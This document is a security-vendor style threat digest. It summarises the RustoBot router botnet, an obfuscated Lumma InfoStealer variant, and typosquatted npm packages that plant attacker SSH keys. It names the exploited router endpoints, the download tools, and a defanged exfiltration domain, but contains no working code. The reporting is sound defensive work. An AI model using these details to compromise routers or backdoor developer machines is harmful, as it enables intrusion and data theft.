RustoBot Targets Routers for DDoS in Growing Global Campaign
RustoBot is a recently discovered malware strain actively exploiting known vulnerabilities in TOTOLINK and DrayTek routers to build a botnet capable of launching high-impact Distributed Denial of Service (DDoS) attacks. Observed between January and February 2025, the malware takes advantage of command injection flaws in specific web interfaces—TOTOLINK’s cstecgi.cgi and DrayTek’s apmcfgupload—which allow remote execution of system-level commands without authentication. Once a vulnerable device is compromised, RustoBot uses common utilities such as wget and tftp to download payloads and propagate across multiple CPU architectures, including ARM (v5 to v7), MIPS, MPSL, and x86. The payloads are designed to be architecture-aware, enabling efficient lateral movement across diverse environments. Upon infection, the malware encrypts its configuration using XOR logic and complex key generation to avoid signature-based detection. The decoded configuration then resolves its command-and-control (C2) domains and receives DDoS instructions. This level of obfuscation and adaptability signals a well-developed, modular threat with active command infrastructure. RustoBot has various DDoS attack capabilities, including raw IP packet flooding, TCP floods, and high-volume UDP attacks. Each attack is initiated through structured commands from its C2 server, with precise parameters including target IPs, port ranges, packet sizes, and duration, allowing attackers to tailor operations based on victim profiles. Campaigns involving RustoBot have been reported in Japan, Taiwan, Vietnam, and Mexico, specifically targeting organizations in the technology sector that rely on vulnerable routers for network connectivity. Its abuse of edge infrastructure not only results in service disruptions but also introduces the risk of these devices being used as persistent footholds for broader intrusion activity. In response, FortiGuard Labs has released antivirus signatures (e.g., BASH/Mirai.AEH!tr.dldr), deployed IPS coverage for the exploited vulnerabilities, and implemented web filtering to block C2 communication. Organizations are advised to patch affected devices, monitor edge traffic for anomalies, and harden access controls to reduce exposure to this evolving threat.
Update: Lumma InfoStealer Evolves with Code Flow Obfuscation to Evade Detection
A newly identified variant of the Lumma InfoStealer malware raises concerns across the cybersecurity landscape due to its implementation of code flow obfuscation—an advanced evasion technique designed to hinder static analysis and reverse engineering. This obfuscation method manipulates program control flow, inserting deceptive logic paths, rerouting execution across nested structures, and embedding anti-debugging measures to resist human and automated inspection. These enhancements allow Lumma to operate under the radar of signature-based antivirus tools, increasing the likelihood of successful credential theft and data exfiltration during the early stages of infection. Though structurally consistent with previous versions, the malware's infection chain is now significantly more resistant to detection due to its hidden logic and the sophistication of its obfuscation strategy. This development marks a notable shift in attacker tactics, prioritizing stealth and persistence over brute-force delivery. The implications for defenders are significant. With static detection weakened and dynamic sandboxing often disrupted by built-in anti-debugging features, security teams must rely more heavily on behavioral analytics and heuristic-based detection methods. Traditional tools may fail to identify this variant until after the initial compromise, increasing the risk to enterprise networks and user environments. The release of this variant reflects a broader trend in cybercrime—where the barrier to deploying highly evasive malware continues to drop due to the commodification of complex threat tooling. It reinforces the urgency for organizations to adopt layered defenses, including memory-level monitoring, machine learning-enhanced detection, and continuous telemetry analysis. Lumma’s updated variant in the wild is a critical reminder that threat actors are actively evolving, and security strategies must keep pace or risk falling behind.
Update: Malicious npm Packages Exploit Telegram API to Backdoor Linux Developer Systems
A recent wave of supply chain attacks has targeted the open-source JavaScript ecosystem through malicious npm packages designed to compromise Linux systems. Threat actors have taken advantage of Telegram’s bot-friendly development environment by distributing libraries impersonating trusted modules—such as node-telegram-bot-api—with deceptive names, including node-telegram-utils, node-telegram-bots-api, and node-telegram-util. Once installed, these packages execute a Linux-specific function, addBotId(), which silently alters the .ssh/authorized_keys file to inject two attacker-controlled SSH public keys. This grants passwordless, persistent access to the infected machine, often without detection, as the code is buried within otherwise benign-looking modules. Even uninstalling the package does not remove the backdoor, exposing developers to long-term system compromise. In addition to unauthorized access, the malware harvests system data using services like ipinfo[.]io to collect the external IP address and username, exfiltrating this information to a malicious server hosted at solana[.]validator[.]blog. This telemetry enables attackers to profile victims further or move laterally within an organization’s infrastructure. The attack highlights critical weaknesses in software supply chains, particularly where open-source libraries are adopted with minimal scrutiny. The reliance on trusted naming conventions and lack of vetting processes in npm repositories allow malicious actors to blend in with legitimate projects. As these threats continue to evolve—often using obfuscation to evade detection—security professionals are urging developers to implement layered defenses, including real-time dependency monitoring and behavioral analysis tools such as those provided by Socket. The incident serves as a clear warning that individual developers and enterprise environments are at risk if security is not tightly integrated into the development lifecycle.
